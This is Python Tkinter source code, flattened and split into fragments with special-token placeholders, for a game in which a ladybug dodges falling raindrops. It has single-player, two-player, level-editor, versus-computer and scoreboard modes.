elif data.rainSpeed == 'rain': data.rSpeed = 10 elif data.rainSpeed == 'drizzle': data.rSpeed = 13 <|reserved_special_token_0|> def levelPowerUp(data): if data.powerUpsEditor == True: if data.time % 20 == 0 and data.time % 40 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 30 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 35 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def levelCreatedMousePressed(event, data): checkHome(event, data) def levelCreatedTimerFired(data): setEverything(data) if data.levelEditorLives > 0: data.cy -= data.speed if data.cy < 15: data.level += 1 if data.cy > 40: data.time += 1 if data.pauseDrops != True: levelCoconutShot(data) if data.powerUpsEditor == False: for coconut in data.coconuts: coconut.onTimerFired(data) hit(data) if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False: coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: if abs(data.start - data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False <|reserved_special_token_0|> def winEditor(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='You Made it!', font= 'Arial 23 bold', fill='yellow') <|reserved_special_token_0|> def difficultyMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.difficulty = data.difM data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY - data.r <= event.y <= data.enterY + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'AI' def difficultyTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) def hitAI1(data, distance): for coconut in data.coconutsAI1: if (data.player1Y - data.r - coconut.y <= distance and data. switchOnProgress == False): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r or AISwitchBug(data, distance) == True): testInt = random.randint(0, 9) if testInt <= data.difficulty: data.switchOnProgress = True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress = False if (coconut.y >= data.player1Y - data.r and coconut.y <= data. player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r): data.player1Y += 50 data.coconutsAI1.remove(coconut) <|reserved_special_token_0|> def hitAI2(data, distance): for coconut in data.coconutsAI2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data. player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data. player2X + data.r): data.player2Y += 50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner == None: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 8 == 0: xPosition2 = random.randint(0, 80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2, 0)) data.coconutsAI1.append(Coconuts(xPosition3, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0)) data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0)) addExtraCoconut(data) addPowerUpsAI(data) <|reserved_special_token_0|> def addPowerUpsAI(data): if data.time % 33 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(550, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 66 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(550, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(750, 750)) <|reserved_special_token_0|> def AITimerFired(data): if data.winner == None: if data.Invincible1 == False: hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False: coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.Invincible1 == False: hitAI1(data, 13) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 13) data.player1Y -= data.speedAI if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 coconutShotAI(data) data.player2Y -= data.speedAI if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) <|reserved_special_token_0|> def AIWinner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='The Computer Won :(', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! You Won!', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def scoreboardKeyPressed(event, data): if event.keysym == 'r': init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!', font='Arial 30 bold', fill='yellow') canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font= 'Arial 20 bold', fill='yellow') drawHome(canvas, data) data.savedScores data.savedScores = readFile('score.txt') score = data.savedScores.splitlines() scores = [] for line in score: scores.append(line.split(',')) scores = sorted(scores, key=lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width / 2, data.scoreShift + i * 50, text= top5[i], font='Arial 18 bold', fill='yellow') <|reserved_special_token_0|> def helpRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, data): timerFired(data) redrawAllWrapper(canvas, data) canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 root = Tk() init(data) canvas = Canvas(root, width=data.width, height=data.height) canvas.pack() root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas, data)) root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) root.mainloop() print('bye!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def init2(data): data.tbg = PhotoImage(file='tbg2.gif') data.click = PhotoImage(file='click.gif') data.notClick = PhotoImage(file='notClick.gif') data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow = data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain = data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives = 2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file='home.gif') data.helpScreen = PhotoImage(file='help1.gif') data.title = PhotoImage(file='title.gif') data.scoreList = [] data.spotList = [270, 364, 458, 552, 646, 740] data.savedScores = readFile('score.txt') if data.mode == 'levelCreated': setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 data.p1ButtonX = 225 data.p2ButtonX = 290 data.edButton = 355 data.diffButton = 425 data.helpButton = 490 data.sboardButton = 555 data.hitPenalty = 75 data.splashText = data.height / 2 - 20 data.lives = 2 data.levelMax = 8 data.lane = 94 data.Player1Min = 270 data.Player1Max = 740 data.homeX = 50 data.homeY = 650 initScoreBoardHelp(data) init1Player(data) <|reserved_special_token_0|> def init1Player(data): data.buffer = 40 def initAI(data): data.AITY = 225 data.easyX = 200 data.easyY = 300 data.medX = 400 data.hardX = 600 data.enterY = 450 data.difS = 4 data.difM = 6 data.difH = 8 data.last = 500 data.enterX = 575 data.PUT = 450 data.RST = 350 data.YST = 250 def mousePressed(event, data): if data.mode == 'splashScreen': splashScreenMousePressed(event, data) elif data.mode == '1Player': playerMousePressed(event, data) elif data.mode == '2Player': twoPlayerMousePressed(event, data) elif data.mode == 'editor': editorMousePressed(event, data) elif data.mode == 'levelCreated': levelCreatedMousePressed(event, data) elif data.mode == 'AI': AIMousePressed(event, data) elif data.mode == 'difficulty': difficultyMousePressed(event, data) elif data.mode == 'scoreboard': scoreboardMousePressed(event, data) elif data.mode == 'help': helpMousePressed(event, data) <|reserved_special_token_0|> def timerFired(data): if data.mode == 'splashScreen': splashScreenTimerFired(data) elif data.mode == '1Player': playerTimerFired(data) elif data.mode == '2Player': twoPlayerTimerFired(data) elif data.mode == 'editor': editorTimerFired(data) elif data.mode == 'levelCreated': levelCreatedTimerFired(data) elif data.mode == 'AI': AITimerFired(data) elif data.mode == 'difficulty': difficultyTimerFired(data) elif data.mode == 'scoreboard': scoreboardTimerFired(data) elif data.mode == 'help': helpTimerFired(data) def redrawAll(canvas, data): if data.mode == 'splashScreen': splashScreenRedrawAll(canvas, data) elif data.mode == '1Player': playerRedrawAll(canvas, data) elif data.mode == '2Player': twoPlayerRedrawAll(canvas, data) elif data.mode == 'editor': editorRedrawAll(canvas, data) elif data.mode == 'levelCreated': levelCreatedRedrawAll(canvas, data) elif data.mode == 'AI': AIRedrawAll(canvas, data) elif data.mode == 'difficulty': difficultyRedrawAll(canvas, data) elif data.mode == 'scoreboard': scoreboardRedrawAll(canvas, data) elif data.mode == 'help': helpRedrawAll(canvas, data) <|reserved_special_token_0|> def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime % 2 == 1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1) canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2) canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3) canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4) canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5) canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6 ) def rainDropSplash(data): xPosition = random.randint(0, 800) data.splashScreenDrops.append(Coconuts(xPosition, 0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.splashText - 10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.splashText, text= """ 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) Scoreboard """ , font='Arial 14 bold', fill='yellow') splashScreenButtons(canvas, data) def writeFile(path, contents): with open(path, 'wt') as f: f.write(contents) def readFile(path): with open(path, 'rt') as f: return f.read() class Coconuts(object): def __init__(self, x, y): self.x = x self.y = y self.r = 9 self.fill = 'deep sky blue' self.speed = 30 self.outline = 'blue' def draw(self, canvas): canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r, self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill= self.fill, outline=self.outline, width=3) def onTimerFired(self, data): self.y += self.speed def hit(data): for coconut in data.coconuts: if data.mode == '1Player' or data.mode == 'levelCreated': if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r: if (coconut.x >= data.cx - data.r and coconut.x <= data.cx + data.r): data.cy += data.hitPenalty if data.mode == 'levelCreated': data.lives -= 1 elif data.hit == False and data.level < data.levelMax: data.score -= data.level data.coconuts.remove(coconut) if data.mode == 'levelCreated': data.levelEditorLives -= 1 def hit2Player(data): if data.mode == '2Player': if data.Invincible1 == False: for coconut in data.coconuts1: if (coconut.y >= data.player1Y - data.r and coconut.y <= data.player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data.player1X + data.r): data.player1Y += data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: for coconut in data.coconuts2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data.player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data.player2X + data.r): data.player2Y += data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): for powerUp in data.powerUps: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.pause2Drop = True data.start2 = data.player2Y data.powerUps.remove(powerUp) class Invincible(PowerUps): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.umbrella) def hitInvincible(data): for powerUp in data.invincible: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.beInvincible = True data.start = data.cy data.invincible.remove(powerUp) if data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.Invincible1 = True data.start1 = data.player1Y data.invincible.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.Invincible2 = True data.start2 = data.player2Y data.invincible.remove(powerUp) class ScaryBug(object): def __init__(self, x, y): self.x = x self.y = y self.speed = 25 def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.spider) def onTimerFired(self, data): if data.mode == '2Player' or data.mode == 'AI': self.speed = 35 self.y -= self.speed if (data.mode == '1Player' or data.mode == 'levelCreated' and data. time % 8 == 0): side = random.choice(data.sides) if side == 'l': if self.x - data.lane >= data.Player1Min: self.x -= data.lane else: self.x += data.lane elif side == 'r': if self.x + data.lane <= data.Player1Max: self.x += data.lane else: self.x -= data.lane def hitScaryBug(data): for bug in data.scaryBug: if data.mode == '1Player' or data.mode == 'levelCreated': if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 * data.r): if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + 1.5 * data.r): data.hit = True data.lives = 0 data.levelEditorLives = 0 if data.mode == '2Player' or data.mode == 'AI': if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y + data.r): if (bug.x >= data.player1X - data.r and bug.x <= data. player1X + data.r): data.winner = 'player2' if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y + data.r): if (bug.x >= data.player2X - data.r and bug.x <= data. player2X + data.r): data.winner = 'player1' def drawPowerups(canvas, data): for bug in data.scaryBug: bug.draw(canvas, data) for powerUp in data.powerUps: powerUp.draw(canvas, data) for powerUp in data.invincible: powerUp.draw(canvas, data) def drawHome(canvas, data): canvas.create_image(data.homeX, data.homeY, image=data.home) <|reserved_special_token_0|> def powerUpCoconutShot(data): if data.time % 60 == 0 and data.time % 120 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 100 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def playerRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level, font='Arial 18 bold', fill='yellow') canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score, font='Arial 18 bold', fill='yellow') canvas.create_text(2 * data.width / 3, 660, text= """The greater the level, the more points get added to your score!""" , font='Arial 15 bold', fill='yellow') if data.hit == True: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') canvas.create_text(data.width / 2, 280, text='Score: %d' % data. score, font='Arial 13 bold', fill='yellow') if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 70, text='You Made it!', font= 'Arial 23 bold', fill='yellow') canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score, font='Arial 15 bold', fill='yellow') canvas.create_text(data.width / 2, 375, text= 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow') canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, 450, fill='white') canvas.create_text(data.width / 2, 425, text=data.name) def drop2Player(data): if data.winner == None and data.pauseDrops == False: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25: if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 12 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconuts1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconuts1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(755, 0)) powerupDrop2Player(data) def powerupDrop2Player(data): if data.time % 45 == 0 and data.time % 90 != 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(540, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) if data.time % 60 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(540, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 90 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(540, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(755, 750)) <|reserved_special_token_0|> def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y -= data.speed if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 drop2Player(data) data.player2Y -= data.speed if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 drop2Player(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def twoPlayerRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill ='yellow') winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 1', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 2', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def editorKeyPressed(event, data): if event.keysym == 'r': init(data) def editorMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.yourSpeed = 'slow' data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.yourSpeed = 'medium' data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.yourSpeed = 'fast' data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): if data.medX - data.r <= event.y <= data.medX + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.rainSpeed = 'drizzle' data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.rainSpeed = 'rain' data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.rainSpeed = 'thunderstorm' data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick <|reserved_special_token_0|> def drawButtons(canvas, data): data.font, data.fill = 'Helvetica 13 bold', 'yellow' canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data. font, fill=data.fill) canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font) canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font) canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font) canvas.create_image(data.easyX, data.medX, image=data.drizzle) canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data. font, fill=data.fill) canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font) canvas.create_image(data.medX, data.medX, image=data.rain) canvas.create_text(data.medX, data.medX, text='Rain', font=data.font) canvas.create_image(data.hardX, data.medX, image=data.thunderstorm) canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font) canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data. font, fill=data.fill) canvas.create_image(data.easyY, data.last, image=data.yes) canvas.create_text(data.easyY, data.last, text='Yes', font=data.font) canvas.create_image(data.last, data.last, image=data.no) canvas.create_text(data.last, data.last, text='No', font=data.font) changeEnter(canvas, data) def changeEnter(canvas, data): if (data.powerUpsEditor != None and data.yourSpeed != None and data. rainSpeed != None): data.enter = data.click canvas.create_image(data.medX, data.enterX, image=data.enter) canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font) def editorTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def editorRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.S_P - 10, text= 'Edit Your Level!', font='Arial 23 bold', fill='yellow') drawButtons(canvas, data) drawHome(canvas, data) def setEverything(data): if data.yourSpeed == 'slow': data.speed = 6 elif data.yourSpeed == 'medium': data.speed = 10 elif data.yourSpeed == 'fast': data.speed = 14 if data.rainSpeed == 'thunderstorm': data.rSpeed = 7 elif data.rainSpeed == 'rain': data.rSpeed = 10 elif data.rainSpeed == 'drizzle': data.rSpeed = 13 <|reserved_special_token_0|> def levelPowerUp(data): if data.powerUpsEditor == True: if data.time % 20 == 0 and data.time % 40 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 30 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 35 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def levelCreatedMousePressed(event, data): checkHome(event, data) def levelCreatedTimerFired(data): setEverything(data) if data.levelEditorLives > 0: data.cy -= data.speed if data.cy < 15: data.level += 1 if data.cy > 40: data.time += 1 if data.pauseDrops != True: levelCoconutShot(data) if data.powerUpsEditor == False: for coconut in data.coconuts: coconut.onTimerFired(data) hit(data) if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False: coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: if abs(data.start - data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False def levelCreatedRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) if data.powerUpsEditor == True: drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data. levelEditorLives, font='Arial 20 bold', fill='yellow') 